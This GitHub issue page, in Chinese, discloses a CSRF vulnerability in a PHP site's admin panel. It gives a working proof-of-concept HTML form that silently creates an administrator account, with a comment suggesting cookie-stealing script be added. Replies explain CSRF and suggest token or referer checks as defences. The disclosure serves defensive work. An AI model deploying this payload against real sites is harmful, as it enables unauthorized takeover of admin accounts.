Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
漏洞发现者:惜潮 恶意攻击者可以精心伪造一个Html页面添加管理员账户对网站进行入侵。 利用代码 exp代码如下:
<span style="font-size:18px;"><!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>csrf测试</title> </head> <body> <form action="http://127.0.0.1//14/index.php?m=admin&c=access&a=adduserhandle" method="POST" id="transfer" name="transfer"> <input type="hidden" name="user_id0" value="1"> <input type="hidden" name="user_login" value="test1"> <!--在这里可以添加JS脚本用于获取cookies csrf+xss--> <input type="hidden" name="password" value="test1"> <input type="hidden" name="rpassword" value="test1"> <input type="hidden" name="user_nicename" value="123"> <input type="hidden" name="user_email" value="123%40Qq.com"> <input type="hidden" name="user_url" value="www.baidu.com"> <input type="hidden" name="user_intro" value="test"> <input type="hidden" name="user_status" value="1"> <input type="hidden" name="role_id" value="1"> <button type="submit" value="Submit">添加管理员</button> </form> </body> </html></span>
The text was updated successfully, but these errors were encountered:
?m=admin&c=access&a=adduserhandle 这个权限 需要管理员才能设置才能执行。不然不会落库
Sorry, something went wrong.
csrf攻击一般是说管理员登陆后,访问到攻击者精心构造的csrf页面,浏览器会带上管理员的cookies进行请求,导致以管理员身份执行操作。防范方法一般可以判断页面请求来源,或增加随机的token。
No branches or pull requests
漏洞发现者:惜潮
恶意攻击者可以精心伪造一个Html页面添加管理员账户对网站进行入侵。
利用代码
exp代码如下:
The text was updated successfully, but these errors were encountered: